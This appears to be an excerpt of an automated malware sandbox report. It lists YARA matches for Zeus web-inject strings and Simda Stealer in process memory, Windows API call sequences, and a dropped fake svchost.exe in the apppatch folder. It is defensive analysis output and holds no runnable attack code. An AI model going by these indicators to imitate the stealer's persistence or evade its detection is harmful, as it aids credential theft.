    Source: 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2144510706.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2083010707.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2143538068.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2147883397.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2148685865.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2125875066.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2142779686.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2150623127.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2106522225.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2144870121.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2149738925.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.1746712616.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2145983048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2112552802.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2143058636.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2078582889.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2147384986.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2150345002.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2145386230.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2128505647.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2079510438.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2150022133.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.2109527836.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: 5AFlyarMds.exe PID: 7508, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6636, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7092, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6976, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6828, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6708, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6472, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6348, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7136, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7068, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7000, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6924, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6808, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6788, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6704, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6660, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6556, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Yara detected Simda Stealer
    Source: Yara matchFile source: 0.2.5AFlyarMds.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.3.svchost.exe.888000.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.5AFlyarMds.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.3.svchost.exe.888000.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 5AFlyarMds.exe PID: 7508, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C979E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,1_2_02C979E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C93A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,1_2_02C93A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F63A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_02F63A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02553A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_02553A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,8_2_025C3A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021D0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004018E0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0043C0D00_2_0043C0D0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004460F00_2_004460F0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004408800_2_00440880
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0044A8A00_2_0044A8A0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004239700_2_00423970
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00445A200_2_00445A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0043CA300_2_0043CA30
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004423400_2_00442340
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0042EB800_2_0042EB80
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00443C000_2_00443C00
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0043CC100_2_0043CC10
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0043AC300_2_0043AC30
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0040ED300_2_0040ED30
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0043A6500_2_0043A650
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004356D00_2_004356D0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004416D00_2_004416D0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0040EF500_2_0040EF50
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004467C00_2_004467C0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004147E00_2_004147E0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004447900_2_00444790
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00408FA00_2_00408FA0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00442FA00_2_00442FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043C0D01_2_0043C0D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004460F01_2_004460F0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004408801_2_00440880
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0044A8A01_2_0044A8A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004239701_2_00423970
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00445A201_2_00445A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043CA301_2_0043CA30
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004423401_2_00442340
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0042EB801_2_0042EB80
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00443C001_2_00443C00
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043CC101_2_0043CC10
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043AC301_2_0043AC30
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0040ED301_2_0040ED30
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043A6501_2_0043A650
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004356D01_2_004356D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004416D01_2_004416D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0040EF501_2_0040EF50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004467C01_2_004467C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004147E01_2_004147E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004447901_2_00444790
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00408FA01_2_00408FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00442FA01_2_00442FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBF2D01_2_02CBF2D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCB2D01_2_02CCB2D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC42501_2_02CC4250
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD82131_2_02CD8213
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD03C01_2_02CD03C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9E3E01_2_02C9E3E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCE3901_2_02CCE390
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C92BA01_2_02C92BA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCCBA01_2_02CCCBA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C98B501_2_02C98B50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCD8001_2_02CCD800
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC68101_2_02CC6810
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC48301_2_02CC4830
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C989301_2_02C98930
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCF6201_2_02CCF620
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC66301_2_02CC6630
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB87801_2_02CB8780
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD17801_2_02CD1780
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCBF401_2_02CCBF40
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC5CD01_2_02CC5CD0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCFCF01_2_02CCFCF0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CCA4801_2_02CCA480
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD44A01_2_02CD44A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAD5701_2_02CAD570
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E7A301_2_029E7A30
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F0A201_2_029F0A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029D9B801_2_029D9B80
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029ED3401_2_029ED340
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029EB8801_2_029EB880
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F58A01_2_029F58A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E70D01_2_029E70D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F10F01_2_029F10F0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029CE9701_2_029CE970
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E06D01_2_029E06D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029EC6D01_2_029EC6D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E56501_2_029E5650
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029EF7901_2_029EF790
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B3FA01_2_029B3FA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029EDFA01_2_029EDFA0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F17C01_2_029F17C0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029BF7E01_2_029BF7E0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B9F501_2_029B9F50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E7C101_2_029E7C10
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029EEC001_2_029EEC00
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029E5C301_2_029E5C30
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B9D301_2_029B9D30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8F2D05_2_02F8F2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9B2D05_2_02F9B2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F942505_2_02F94250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA82135_2_02FA8213
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6E3E05_2_02F6E3E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA03C05_2_02FA03C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F62BA05_2_02F62BA0
